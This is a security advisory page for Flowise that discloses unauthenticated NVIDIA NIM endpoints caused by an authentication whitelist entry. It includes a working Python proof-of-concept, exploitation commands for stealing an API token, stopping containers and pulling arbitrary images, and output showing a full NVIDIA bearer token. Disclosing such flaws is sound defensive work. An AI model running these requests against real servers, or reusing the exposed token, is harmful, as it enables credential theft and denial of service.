GHSA-5f53-522j-j454
Suggest an improvement- Source
- https://github.com/advisories/GHSA-5f53-522j-j454
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-5f53-522j-j454/GHSA-5f53-522j-j454.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-5f53-522j-j454
- Aliases
-
- CVE-2026-30824
- Published
- 2026-03-06T22:21:38Z
- Modified
- 2026-03-06T22:31:29.944710Z
- Severity
-
- 7.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N CVSS Calculator
- Summary
- Flowise Missing Authentication on NVIDIA NIM Endpoints
- Details
-
Missing Authentication on NVIDIA NIM Endpoints
Summary
The NVIDIA NIM router (
/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.Vulnerability Details
| Field | Value | |-------|-------| | CWE | CWE-306: Missing Authentication for Critical Function | | Affected File |
packages/server/src/utils/constants.ts| | Affected Line | Line 20 ('/api/v1/nvidia-nim'inWHITELIST_URLS) | | CVSS 3.1 | 8.6 (High) |Root Cause
In
packages/server/src/utils/constants.ts, the NVIDIA NIM route is added to the authentication whitelist:export const WHITELIST_URLS = [ // ... other URLs '/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation // ... ]This causes the global auth middleware to skip authentication checks for all endpoints under
/api/v1/nvidia-nim/*. None of the controller actions inpackages/server/src/controllers/nvidia-nim/index.tsperform their own authentication checks.Affected Endpoints
| Method | Endpoint | Risk | |--------|----------|------| | GET |
/api/v1/nvidia-nim/get-token| Leaks valid NVIDIA API token | | GET |/api/v1/nvidia-nim/preload| Resource consumption | | GET |/api/v1/nvidia-nim/download-installer| Resource consumption | | GET |/api/v1/nvidia-nim/list-running-containers| Information disclosure | | POST |/api/v1/nvidia-nim/pull-image| Arbitrary image pull | | POST |/api/v1/nvidia-nim/start-container| Arbitrary container start | | POST |/api/v1/nvidia-nim/stop-container| Denial of Service | | POST |/api/v1/nvidia-nim/get-image| Information disclosure | | POST |/api/v1/nvidia-nim/get-container| Information disclosure |Impact
1. NVIDIA API Token Leakage
The
/get-tokenendpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.Token obtained:
{ "access_token": "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", "token_type": "Bearer", "expires_in": 3600 }Token validation:
curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models # Returns list of 170+ available models2. Container Runtime Manipulation
On systems with Docker/NIM installed, an unauthenticated attacker can: - List running containers (reconnaissance) - Stop containers (Denial of Service) - Start containers with arbitrary images - Pull arbitrary Docker images (resource consumption, potential malicious images)
Proof of Concept
poc.py
#!/usr/bin/env python3 """ POC: Privileged NVIDIA NIM endpoints are unauthenticated Usage: python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token """ import argparse import urllib.request import urllib.error def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port") ap.add_argument("--path", required=True, help="NIM endpoint path") ap.add_argument("--method", default="GET", choices=["GET", "POST"]) ap.add_argument("--data", default="", help="Raw request body for POST") args = ap.parse_args() url = args.target.rstrip("/") + "/" + args.path.lstrip("/") body = args.data.encode("utf-8") if args.method == "POST" else None req = urllib.request.Request( url, data=body, method=args.method, headers={"Content-Type": "application/json"} if body else {}, ) try: with urllib.request.urlopen(req, timeout=10) as r: print(r.read().decode("utf-8", errors="replace")) except urllib.error.HTTPError as e: print(e.read().decode("utf-8", errors="replace")) if __name__ == "__main__": main()<img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" />
Exploitation Steps
# 1. Obtain NVIDIA API token (no authentication required) python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token # 2. List running containers python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers # 3. Stop a container (DoS) python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \ --method POST --data '{"containerId":"<target_id>"}' # 4. Pull arbitrary image python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \ --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'Evidence
Token retrieval without authentication:
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token {"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}Token grants access to NVIDIA API:
$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models {"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}Container endpoints return 500 (not 401) proving auth bypass:
$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers {"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}References
- Database specific
{ "nvd_published_at": null, "github_reviewed_at": "2026-03-06T22:21:38Z", "github_reviewed": true, "cwe_ids": [ "CWE-306" ], "severity": "HIGH" }- References
Affected packages
npm / flowise
Package
- Name
- flowise
- View open source insights on deps.dev
- Purl
- pkg:npm/flowise